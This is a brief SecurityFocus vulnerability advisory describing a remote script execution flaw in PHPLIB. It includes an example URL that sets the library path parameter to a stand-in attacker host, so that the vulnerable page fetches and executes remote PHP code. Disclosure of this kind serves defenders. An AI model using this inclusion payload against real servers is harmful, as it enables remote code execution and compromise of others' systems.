Multiple Vendor PHPLIB Remote Script Execution Vulnerability

An example was provided by giancarlo pinerolo <giancarlo@navigare.net>:

If $_PHPLIB[libdir] is a string whose value
is "http://attacker.com/", this instruction will be executed:

require("http://attacker.com/" . "db_mysql.inc");

Thus, simply crafting a URL like:

http://victim.com/any/phplib/page.php?_PHPLIB[libdir]=http://attacker.com/

will make the script 'page.php'(which the attacker knows is based on the PHPLIB toolkit) include and execute any arbitrary php instruction contained in a file named 'db_mysql.inc'.


 

Privacy Statement
Copyright 2010, SecurityFocus